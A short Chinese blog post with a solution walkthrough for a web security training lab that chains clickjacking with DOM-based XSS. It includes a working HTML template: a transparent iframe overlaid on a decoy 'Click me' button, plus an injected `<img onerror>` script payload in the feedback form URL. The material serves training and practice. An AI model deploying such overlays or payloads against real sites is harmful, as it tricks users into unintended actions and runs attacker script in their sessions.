Exploiting clickjacking vulnerability to trigger DOM-based XSS:利用点击劫持漏洞触发基于DOM的XSS

实验内容

该实验室包含一个由点击触发的XSS漏洞。构建一个点击劫持攻击,欺骗用户点击“点击我”按钮来调用该print()函数。

解决方法:

<style>
   iframe {
       position:relative;
       width:500;
       height: 700;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:610;
       left:80;
       z-index: 1;
   }
</style>
<div>Click me</div>
<iframe
src="https://xxxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>
  • 转到漏洞利用服务器并将 HTML 模板粘贴到“body”部分:
  • 单击“存储”,然后单击“查看漏洞利用”。
  • 将鼠标悬停在“Test me”上并确保光标变为手形,表明 div 元素已正确定位。如果没有,则通过修改样式表的 top 和 left 属性来调整 div 元素的位置。
  • 单击“测试我”。打印对话框应该打开。
  • 将“Test me”更改为“Click me”,然后在漏洞利用服务器上单击“Store”。
  • 现在点击“向受害者提供漏洞利用”,实验室应该就解决了
  • 这里主要是一个基于Dom的XSS漏洞
    image
  • 可以看见一个Submitfeedback的字段,这里面就存在着DOM的xss漏洞,通过print的点击劫持,将email修改为黑客的email上
posted @ 2021-08-24 10:03  Zeker62  阅读(81)  评论(0编辑  收藏  举报